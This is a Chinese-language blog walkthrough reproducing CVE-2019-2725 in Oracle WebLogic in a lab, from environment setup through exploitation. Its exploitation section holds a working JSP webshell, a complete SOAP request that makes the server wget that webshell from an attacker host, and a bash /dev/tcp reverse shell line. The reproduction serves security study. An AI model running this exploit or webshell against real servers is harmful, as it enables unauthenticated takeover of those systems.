文章目錄

• 一、前言
• 二、漏洞描述
• 三、影響版本
• 四、測試環境準備
• • 1、Ubuntu
  • 2、Windows
  • 3、jdk7
  • 4、weblogic10.3.6
• 五、環境搭建
• • 1、安裝jdk7
  • • （1）將下載好的jdk文件傳到ubuntu中
    • （2）在/usr/lib目錄中創建一個jvm目錄，將該jdk文件移動其中
    • （3）將jdk-7u80-linux-x64.tar.gz進行解壓
    • （4）將jdk1.7.0_80目錄重命名為jdk
    • （5）修改.bashrc配置文件
    • （6）reboot重啟ubuntu
    • （7）查看java版本
  • 2、安裝weblogic
  • • （1）移動wls1036_generic.jar
    • （2）執行安裝命令，具體過程如下
    • （2）安裝完成后，執行domain域
    • （3）配置過程
    • （4）啟動weblogic
    • （5）訪問weblogic服務
    • （6）主機訪問虛擬機
• 六、漏洞驗證
• • 1、payoad1
  • 2、payload2
• 七、漏洞利用
• • 1、環境
  • • （1）有web服務的攻擊機或vps
    • （2）jsp一句話木馬
  • 2、使用burp寫入jsp木馬
  • • （1）訪問http://172.16.20.157:7001/_async/AsyncResponseService并抓包
    • （2）將GET改為POST，隨后請求包部分除了第一行第二行保留，其他全部替換如下payload
    • （3）使用payload上傳jsp木馬
    • （4）訪問靶機的1.jsp
    • （5）蟻劍連接
  • 3、反彈shell
  • • （1）payload
    • （2）利用詳情
• 八、漏洞修復

一、前言

這一篇文章是我今天復現CVE-2019-2725時之后總結的一次完整的復現流程（從環境搭建到getshell），算是比較全的復現過程了，供大家參考，如有不足，歡迎指正。

二、漏洞描述

Oracle WebLogic Server反序列化漏洞 ，該遠程代碼執行漏洞無需身份驗證即可遠程利用，即無需用戶名和密碼即可通過網絡利用。

三、影響版本

Oracle WebLogic Server，版本 10.3.6.0、12.1.3.0

四、測試環境準備

注：我這里主要介紹linux下weblogic的搭建

1、Ubuntu

我用的ubuntu16，大家隨意

2、Windows

我用的windows10，大家隨意

3、jdk7

這里建議使用jdk7，我用的是jdk-7u80-linux-x64，當然，不一定非要是7u80，其他也可以
下載地址：https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html#jdk-7u80-oth-JPR

如果大家無法下載，我傳到了百度云，大家可自行去下載，地址：
鏈接：https://pan.baidu.com/s/1A4o5Z6uU-qymo9kp8oxeGQ
提取碼：m71r

4、weblogic10.3.6

這里我使用的是weblogic10.3.6
下載地址：https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html

百度云地址：
鏈接：https://pan.baidu.com/s/1heHPX7ihWrlHzYtUWgKvOA
提取碼：tatl

五、環境搭建

ubuntu搭建就不細說了，我們接下來開始搭建weblogic服務

1、安裝jdk7

（1）將下載好的jdk文件傳到ubuntu中

（2）在/usr/lib目錄中創建一個jvm目錄，將該jdk文件移動其中

cd /usr/lib/ sudo mkdir jvm sudo mv /home/n1v1r/桌面/jdk-7u80-linux-x64.tar.gz jvm/ cd jvm/

（3）將jdk-7u80-linux-x64.tar.gz進行解壓

sudo tar zxf jdk-7u80-linux-x64.tar.gz

（4）將jdk1.7.0_80目錄重命名為jdk

注：重命名隨意，只不過需要注意的是.bashrc文件中/usr/lib/jvm/后面的名稱也需要跟著改變

（5）修改.bashrc配置文件

sudo vim ~/.bashrc

可能出現的錯誤：如果無法使用vim，使用sudo apt-get install vim進行安裝

注：有人在使用以上安裝命令時也可能會出現如下所示錯誤

E: 無法獲得鎖 /var/lib/dpkg/lock - open (11: 資源暫時不可用) E: 無法鎖定管理目錄(/var/lib/dpkg/)，是否有其他進程正占用它？

解決方法，輸入如下命令：

sudo rm /var/cache/apt/archives/lock sudo rm /var/lib/dpkg/lock

打開文件后，我們在內容的末尾追加如下內容：

export JAVA_HOME=/usr/lib/jvm/jdk export JRE_HOME=${JAVA_HOME}/jre export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib export PATH=${JAVA_HOME}/bin:$PATH

（6）reboot重啟ubuntu

（7）查看java版本

出現如下你安裝的指定版本，說明安裝成功

2、安裝weblogic

注：先完成第一步jdk的安裝再進行這一步

（1）移動wls1036_generic.jar

將下載好的wls1036_generic.jar移動到ubuntu的用戶目錄下，我這里是n1v1r，如下所示

（2）執行安裝命令，具體過程如下

我這里使用的是命令行安裝，如下所示：

java -jar wls1036_generic.jar -mode=console

注：-mode=console表示使用命令行安裝，如果想要使用圖形化，使用如下命令即可，步驟是一樣的

java -jar wls1036_generic.jar

這里詳細介紹一下命令行安裝步驟
0x01：

0x02：

0x03：

0x04：


0x05：

0x06：

0x07：

0x08：

0x09：

0x10：出現下圖所示表示安裝成功

注：其實這里每一步都是下一步也可以

（2）安裝完成后，執行domain域

0x01：進入weblogic的安裝目錄，找到config.sh
例如我這里/home/n1v1r/Oracle/Middleware/wlserver_10.3/common/bin
輸入./config.sh，回車

（3）配置過程

（4）啟動weblogic

進入domain的安裝目錄，例如：
/home/nv1r/Oracle/Middleware/user_projects/domains/peak_domain
隨后./startWebLogic.sh
注：我這里的n1v1r和peak_domain要根據你們自己的設置進行更改

（5）訪問weblogic服務

訪問：http://172.16.20.157:7001/console/
注：這里的ip可以是127.0.0.1或localhost

（6）主機訪問虛擬機

注：需要將ubuntu的防火墻關閉，且主機能ping通ubuntu，不代表ubuntu防火墻關閉了

#查看防火墻狀態 sudo ufw status #關閉防火墻 sudo ufw disable #打開防火墻 sudo ufw enable

訪問http://172.16.20.157:7001/console


注：如果還是無法訪問且無法ping通，可參考這種解決方法：關于Vmware下NAT模式物理機無法ping通虛擬機但是可以上網的解決方法

六、漏洞驗證

1、payoad1

_async/AsyncResponseService

如果http://172.16.20.157:7001/_async/AsyncResponseService返回200則表示漏洞存在，如果返回404則表示漏洞不存在

2、payload2

_async

如果http://172.16.20.157:7001/_async返回403則表示漏洞存在，如果返回404則表示漏洞不存在

七、漏洞利用

注：利用時ubuntu需要安裝wget命令

sudo apt-get install wget

1、環境

（1）有web服務的攻擊機或vps

我這里使用本地環境，在本地使用phpstudy

（2）jsp一句話木馬

jsp.txt源碼，其中密碼是peak，可自己修改

<%!class U extends ClassLoader {U(ClassLoader c) {super(c);}public Class g(byte[] b) {return super.defineClass(b, 0, b.length);}}public byte[] base64Decode(String str) throws Exception {try {Class clazz = Class.forName("sun.misc.BASE64Decoder");return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);} catch (Exception e) {Class clazz = Class.forName("java.util.Base64");Object decoder = clazz.getMethod("getDecoder").invoke(null);return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);}} %> <%String cls = request.getParameter("peak");if (cls != null) {new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);} %>

2、使用burp寫入jsp木馬

（1）訪問http://172.16.20.157:7001/_async/AsyncResponseService并抓包

（2）將GET改為POST，隨后請求包部分除了第一行第二行保留，其他全部替換如下payload

POST /_async/AsyncResponseService HTTP/1.1 Host: 172.16.20.157:7001 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close Content-Length: 841 Accept-Encoding: gzip, deflate SOAPAction: Accept: */* User-Agent: Apache-HttpClient/4.1.1 (java 1.5) Connection: keep-alive content-type: text/xml<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action> <wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>wget http://172.16.20.1/jsp.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/1.jsp</string> </void> </array> <void method="start"/></void> </work:WorkContext> </soapenv:Header> <soapenv:Body> <asy:onAsyncDelivery/> </soapenv:Body></soapenv:Envelope>

注意：如果你不知道上傳到目標哪個目錄中，可以使用如下payload，進行查看

/_async/AsyncResponseService?info

如下所示：

（3）使用payload上傳jsp木馬

（4）訪問靶機的1.jsp

http://172.16.20.157:7001/_async/1.jsp

訪問成功即可使用蟻劍進行連接

（5）蟻劍連接

3、反彈shell

（1）payload

bash -i >& /dev/tcp/target ip/target port 0>&1 這里>&需要轉換，否則無法利用 例： bash -i &gt;&amp; /dev/tcp/172.16.20.132/9999 0&gt;&amp;1

（2）利用詳情

注：如果對反彈shell不太了解的可以參考：nc——制作后門連接與反彈shell連接的使用

八、漏洞修復

官方補丁：https://www.oracle.com/security-alerts/alert-cve-2019-2725.html

注：
JDK搭建參考
weblogic搭建參考

總結

以上是生活随笔為你收集整理的CVE-2019-2725复现（从环境搭建到getshell）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。